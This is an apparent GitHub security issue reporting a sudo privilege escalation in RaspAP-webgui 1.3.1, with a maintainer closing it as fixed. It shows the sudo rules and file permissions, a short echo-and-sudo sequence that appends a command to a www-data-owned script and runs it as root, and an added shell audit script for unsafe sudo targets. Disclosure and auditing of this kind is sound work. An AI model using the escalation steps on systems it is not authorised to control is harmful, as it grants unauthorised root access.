[Security] Sudo Privilege Escalation #225

Closed
ghost opened this issue Aug 27, 2018 · 1 comment

ghost commented Aug 27, 2018

Subject of the issue

The www-data user can escalate his privileges to root in RaspAP-webgui v1.3.1 using sudo, because of wrong rights on /etc/raspap/hostapd/enablelog.sh and /etc/raspap/hostapd/disablelog.sh.

Steps to reproduce

$ sudo -l
	Matching Defaults entries for www-data on raspberrypi:
	env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
	User www-data may run the following commands on raspberrypi:
		(ALL) NOPASSWD:/sbin/ifdown wlan0
		(ALL) NOPASSWD:/sbin/ifup wlan0
		(ALL) NOPASSWD:/bin/cat /etc/wpa_supplicant/wpa_supplicant.conf
		(ALL) NOPASSWD:/bin/cp /tmp/wifidata /etc/wpa_supplicant/wpa_supplicant.conf
		(ALL) NOPASSWD:/sbin/wpa_cli scan_results
		(ALL) NOPASSWD:/sbin/wpa_cli scan
		(ALL) NOPASSWD:/sbin/wpa_cli reconfigure
		(ALL) NOPASSWD:/bin/cp /tmp/hostapddata /etc/hostapd/hostapd.conf
		(ALL) NOPASSWD:/etc/init.d/hostapd start
		(ALL) NOPASSWD:/etc/init.d/hostapd stop
		(ALL) NOPASSWD:/etc/init.d/dnsmasq start
		(ALL) NOPASSWD:/etc/init.d/dnsmasq stop
		(ALL) NOPASSWD:/bin/cp /tmp/dhcpddata /etc/dnsmasq.conf
		(ALL) NOPASSWD:/sbin/shutdown -h now
		(ALL) NOPASSWD:/sbin/reboot
		(ALL) NOPASSWD:/sbin/ip link set wlan0 down
		(ALL) NOPASSWD:/sbin/ip link set wlan0 up
		(ALL) NOPASSWD:/sbin/ip -s a f label wlan0
		(ALL) NOPASSWD:/bin/cp /etc/raspap/networking/dhcpcd.conf /etc/dhcpcd.conf
		(ALL) NOPASSWD:/etc/raspap/hostapd/enablelog.sh
		(ALL) NOPASSWD:/etc/raspap/hostapd/disablelog.sh
$ ls -l /etc/raspap/hostapd
	-rwxr-xr-x 1 www-data www-data 102 Jan 1 2018 disablelog.sh
	-rwxr-xr-x 1 www-data www-data 101 Jan 1 2018 enablelog.sh

www-data has the right to modify disablelog.sh and enablelog.sh, so he can escalate to root using sudo.

$ id
	uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ echo "id" >> /etc/raspap/hostapd/enablelog.sh
$ sudo /etc/raspap/hostapd/enablelog.sh
	uid=0(root) gid=0(root) groups=0(root)

Expected behaviour

disablelog.sh and enablelog.sh must not be editable by www-data.
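
The condition reported above, a NOPASSWD sudo target that the invoking account owns, can be checked for mechanically. This is an added example, not part of the original issue or the RaspAP project's code; the function names and the trusted-UID parameter are assumptions of the example, and it also checks each target's parent directory, which goes beyond what the issue shows.

```shell
#!/bin/sh
# Added example (not RaspAP code): flag sudo NOPASSWD targets that a non-root
# account could rewrite. Needs a stat(1) that supports -c (GNU or BusyBox).

# Print the command path of each NOPASSWD rule in `sudo -l` output on stdin.
# Handles one command per line, the layout shown in the issue.
sudo_targets() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*NOPASSWD:[[:space:]]*\([^[:space:]]*\).*/\1/p' |
        sort -u
}

# path_is_safe PATH [TRUSTED_UID]
# 0: owned by TRUSTED_UID (default 0, root) and not group/other writable.
# 1: wrong owner or loose mode.  2: path missing or unreadable.
path_is_safe() {
    _info=$(stat -L -c '%u %a' -- "$1" 2>/dev/null) || return 2
    _owner=${_info% *}
    _mode=${_info#* }
    [ "$_owner" = "${2:-0}" ] || return 1
    # Treat the mode as octal and test the group (020) and other (002) write bits.
    [ $(( 0$_mode & 022 )) -eq 0 ] || return 1
    return 0
}

# audit_sudo_targets [TRUSTED_UID]  (reads `sudo -l` output on stdin)
# Checks each target and its parent directory: a writable directory lets the
# file be replaced even when the file itself is locked down.
# Prints one line per finding; returns 1 if anything was flagged.
audit_sudo_targets() {
    _trusted=${1:-0}
    _rc=0
    for _t in $(sudo_targets); do
        for _p in "$_t" "$(dirname "$_t")"; do
            path_is_safe "$_p" "$_trusted" && continue
            echo "UNSAFE: $_p (sudo target: $_t)"
            _rc=1
        done
    done
    return $_rc
}

# Typical use, as the account being audited:
#   sudo -l | audit_sudo_targets
```
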

D9ping added a commit to D9ping/raspap-webgui that referenced this issue Aug 27, 2018
Removed duplicated create_logging_scripts function.

Signed-off-by: D9ping <D9ping@users.noreply.github.com>

billz (Member) commented Sep 6, 2018

Fixed by @D9ping. Thanks

billz closed this as completed Sep 6, 2018